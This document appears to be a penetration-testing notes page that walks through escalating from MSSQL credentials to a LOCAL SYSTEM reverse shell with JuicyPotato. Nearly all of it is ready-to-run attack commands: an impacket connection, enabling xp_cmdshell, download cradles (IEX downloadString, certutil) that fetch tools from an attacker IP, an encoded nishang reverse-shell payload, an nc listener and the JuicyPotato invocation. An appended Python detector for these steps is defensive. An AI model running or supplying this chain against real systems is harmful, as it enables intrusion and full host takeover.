PRIMARY CATEGORY → SEIMPERSONATEPRIVILEGE

JuicyPotato

Code Execution as LOCAL SYSTEM

It does not work on Windows Server 2019 or Windows 10 build 1809 and later

Let's suppose we gain privileged access to a domain-joined machine and find a creds.txt file in the Administrator's desktop folder

It contains the credentials of a domain user account which has privileges over an MSSQL instance on a domain-joined MSSQL server

Connecting to the MSSQL Instance

Therefore, we can leverage these credentials to establish a connection to the MSSQL instance as the given principal

To do so, we can proceed as follows

Impacket’s MSSQLClient.py

mssqlclient.py -dc-ip '<DC>' -windows-auth '<DOMAIN>/<USER>:<PASSWD>@<MSSQL_SERVER>'

Gaining Code Execution through the XP_CMDSHELL Procedure

Since the given domain user account holds the sysadmin role within the MSSQL instance, we can enable the XP_CMDSHELL stored procedure in order to run system commands as the domain or local service account the instance runs under

Enabling XP_CMDSHELL

SQL> enable_xp_cmdshell

Running System Commands

SQL> xp_cmdshell <COMMAND>

Verifying Sensitive Privileges

Retrieving the Service Account Name

First, we can run the following command to retrieve the name of the service account running the MSSQL instance

SQL> xp_cmdshell whoami

And we are able to run commands as a LOCAL SERVICE account

Verifying the Service Account Privileges

Service accounts such as LOCAL SERVICE typically have sensitive privileges such as SeImpersonatePrivilege enabled

If so, we can leverage the latter to coerce a process running as LOCAL SYSTEM to authenticate itself to an IPC endpoint that we have set up previously

This way we obtain a specific thread running under the security context of the LOCAL SYSTEM account, through client impersonation carried out by leveraging the SeImpersonatePrivilege of the LOCAL SERVICE account

From here, we call the following API Functions →

So, in order to carry out this workflow, we must have SeImpersonatePrivilege enabled. We can verify this as follows

SQL> xp_cmdshell whoami /priv

And it is!

Therefore, we can upload a JuicyPotato binary to the target in order to send a Reverse Shell as LOCAL SYSTEM to our attacker machine

Extracting valid CLSIDs

CLSID List

GetCLSID.ps1

Downloading the PS Script

From the attacker ⚔️

curl --silent --location --request GET --remote-name 'https://github.com/ohpe/juicy-potato/raw/refs/heads/master/CLSID/GetCLSID.ps1'

Transferring it to the target

From the attacker ⚔️

python3 -m http.server 80

From the target 🎯

mkdir "$env:systemroot\Temp\LPE"
cd "$env:systemroot\Temp\LPE"
IEX (New-Object Net.WebClient).downloadString('http://<ATTACKER_IP>/GetCLSID.ps1')

Listing the available CLSIDs

From the target 🎯

Get-Content '.\<DIRECTORY>\CLSID.list'

Getting Command Execution as LOCAL SYSTEM

Downloading the JuicyPotato executable

From the attacker ⚔️

curl --silent --location --request GET 'https://github.com/ohpe/juicy-potato/releases/download/v0.1/JuicyPotato.exe' --remote-name

Transferring JuicyPotato to the Target

From the attacker ⚔️

python3 -m http.server 80

From the target 🎯

certutil.exe -urlcache -split -f 'http://<ATTACKER_IP>/JuicyPotato.exe'

Downloading a PS Reverse Shell Oneliner

From the attacker ⚔️

curl --silent --location --request GET 'https://github.com/samratashok/nishang/raw/refs/heads/master/Shells/Invoke-PowerShellTcpOneLine.ps1' --output rev.ps1

Then, we edit it and replace the IP address and TCP port with our own

Setting up the PS Command we will pass to the JuicyPotato Binary

From the attacker ⚔️

echo -n 'IEX (New-Object Net.WebClient).downloadString("http://<ATTACKER_IP>/rev.ps1")' | iconv --from-code UTF-8 --to-code UTF-16LE | base64 -w 0 ; echo

Setting up a TCP Listener

From the attacker ⚔️

Use the same TCP port as the one specified in rev.ps1

rlwrap -CaR nc -nlvp <PORT>

Running the Exploit

From the target 🎯

.\JuicyPotato.exe -t * -l 1337 -p cmd.exe -a "/c powershell.exe -EncodedCommand SQBFAFgAIAAoAE4AZQB3...AA==" -c '<CLSID>'

Then, we will receive an incoming reverse shell as LOCAL SYSTEM
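From the defender's side, the chain above leaves a recognisable trail in process-creation telemetry. The following detection logic is an added example, not part of the original notes or of the JuicyPotato project: it runs over constructed Sysmon-style process-creation events (field names assumed) and flags a shell spawned by sqlservr.exe (xp_cmdshell), a whoami /priv privilege check, a certutil download, a -EncodedCommand that unwraps (base64, then UTF-16LE) to a download cradle, and potato-style CLSID/-l/-p arguments.

```python
import base64
import ntpath
import re

# Constructed Sysmon-style process-creation events with assumed field names (not from any
# real host); the CLSID in the third event is a placeholder, not a real COM class id.
CRADLE = 'IEX (New-Object Net.WebClient).downloadString("http://10.0.0.5/rev.ps1")'
ENCODED = base64.b64encode(CRADLE.encode("utf-16-le")).decode()
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\cmd.exe", "CommandLine": "cmd.exe /c whoami /priv",
     "ParentImage": r"C:\Program Files\Microsoft SQL Server\MSSQL\Binn\sqlservr.exe"},
    {"Image": r"C:\Windows\System32\certutil.exe", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "certutil.exe -urlcache -split -f http://10.0.0.5/JuicyPotato.exe"},
    {"Image": r"C:\Windows\Temp\LPE\JuicyPotato.exe", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": f'JuicyPotato.exe -t * -l 1337 -p cmd.exe -a "/c powershell.exe '
                    f'-EncodedCommand {ENCODED}" -c {{11111111-2222-3333-4444-555555555555}}'},
]
ENC_RE = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)
GUID_RE = re.compile(r"\{?[0-9a-f]{8}(?:-[0-9a-f]{4}){3}-[0-9a-f]{12}\}?", re.I)


def decode_encoded_command(cmdline):
    """Reverse the UTF-16LE + base64 wrapping that PowerShell expects for -EncodedCommand."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze_event(ev):
    """Return the detection tags that fire for one process-creation event."""
    tags, cmd, low = [], ev["CommandLine"], ev["CommandLine"].lower()
    image, parent = (ntpath.basename(ev[k]).lower() for k in ("Image", "ParentImage"))
    if parent == "sqlservr.exe" and image in ("cmd.exe", "powershell.exe", "pwsh.exe"):
        tags.append("shell_spawned_by_sqlservr")  # xp_cmdshell handing out a shell
    if "whoami" in low and "/priv" in low:
        tags.append("privilege_enumeration")  # token privilege recon (whoami /priv)
    if image == "certutil.exe" and "-urlcache" in low:
        tags.append("certutil_download")  # LOLBin used to fetch a payload
    decoded = decode_encoded_command(cmd)
    if decoded and re.search(r"downloadstring|net\.webclient|\biex\b", decoded, re.I):
        tags.append("encoded_download_cradle")  # base64-hidden IEX download cradle
    if GUID_RE.search(cmd) and " -l " in low and " -p " in low:
        tags.append("potato_style_arguments")  # CLSID + COM listen port + program to run
    return tags


def analyze_events(events):
    """Map event index -> tags for every event that fired at least one tag."""
    return {i: tags for i, ev in enumerate(events) if (tags := analyze_event(ev))}
```

Feeding SAMPLE_EVENTS to analyze_events returns a hit for every one of the three constructed events; the encoded-command decoder is the same transformation as the iconv/base64 pipeline above, run in reverse.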


Examples